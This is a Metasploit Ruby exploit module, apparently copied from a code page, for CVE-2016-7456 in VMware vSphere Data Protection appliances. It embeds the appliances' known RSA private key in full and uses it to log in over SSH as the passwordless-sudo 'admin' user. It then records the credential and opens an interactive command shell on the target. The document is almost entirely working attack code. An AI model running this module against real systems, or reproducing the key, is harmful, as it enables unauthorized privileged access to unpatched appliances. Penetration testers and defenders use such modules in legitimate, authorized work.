Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13
  include Msf::Auxiliary::Report
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        {
20
          'Name' => 'VMware VDP Known SSH Key',
21
          'Description' => %q{
22
            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
23
          },
24
          'Platform' => 'unix',
25
          'Arch' => ARCH_CMD,
26
          'Privileged' => true,
27
          'Targets' => [ [ 'Universal', {} ] ],
28
          'Payload' => {
29
            'Compat' => {
30
              'PayloadType' => 'cmd_interact',
31
              'ConnectionType' => 'find'
32
            }
33
          },
34
          'Author' => ['phroxvs'],
35
          'License' => MSF_LICENSE,
36
          'References' => [
37
            [ 'CVE', '2016-7456' ],
38
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
39
          ],
40
          'DisclosureDate' => '2016-12-20',
41
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
42
          'DefaultTarget' => 0,
43
          'Notes' => {
44
            'Stability' => [CRASH_SAFE],
45
            'Reliability' => [REPEATABLE_SESSION],
46
            'SideEffects' => []
47
          }
48
        }
49
      )
50
    )
51

52
    register_options(
53
      [
54
        # Since we don't include Tcp, we have to register this manually
55
        Opt::RHOST(),
56
        Opt::RPORT(22)
57
      ], self.class
58
    )
59

60
    register_advanced_options(
61
      [
62
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
63
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
64
      ]
65
    )
66
  end
67

68
  # helper methods that normally come from Tcp
69
  def rhost
70
    datastore['RHOST']
71
  end
72

73
  def rport
74
    datastore['RPORT']
75
  end
76

77
  def do_login
78
    opt_hash = ssh_client_defaults.merge({
79
      auth_methods: ['publickey'],
80
      port: rport,
81
      key_data: [ key_data ]
82
    })
83
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
84
    begin
85
      ssh_socket = nil
86
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
87
        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)
88
      end
89
    rescue Rex::ConnectionError
90
      return
91
    rescue Net::SSH::Disconnect, ::EOFError
92
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
93
      return
94
    rescue ::Timeout::Error
95
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
96
      return
97
    rescue Net::SSH::AuthenticationFailed
98
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
99
    rescue Net::SSH::Exception => e
100
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
101
      return
102
    end
103

104
    if ssh_socket
105

106
      # Create a new session from the socket, then dump it.
107
      conn = Net::SSH::CommandStream.new(ssh_socket)
108
      sockets.delete(ssh_socket.transport.socket)
109

110
      return conn
111
    else
112
      return false
113
    end
114
  end
115

116
  def exploit
117
    conn = do_login
118
    if conn
119
      print_good 'Successful login'
120
      service_data = {
121
        address: rhost,
122
        port: rport,
123
        protocol: 'tcp',
124
        service_name: 'ssh',
125
        workspace_id: myworkspace_id
126
      }
127
      credential_data = {
128
        username: 'admin',
129
        private_type: :ssh_key,
130
        private_data: key_data,
131
        origin_type: :service,
132
        module_fullname: fullname
133
      }.merge(service_data)
134

135
      core = create_credential(credential_data)
136
      login_data = {
137
        core: core,
138
        last_attempted: Time.now
139
      }.merge(service_data)
140

141
      create_credential_login(login_data)
142
      handler(conn.lsock)
143
    end
144
  end
145

146
  def key_data
147
    <<~EOF
148
      -----BEGIN RSA PRIVATE KEY-----
149
      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
150
      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
151
      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
152
      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
153
      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
154
      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
155
      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
156
      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
157
      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
158
      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
159
      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
160
      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
161
      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
162
      -----END RSA PRIVATE KEY-----
163
    EOF
164
  end
165
end
166

167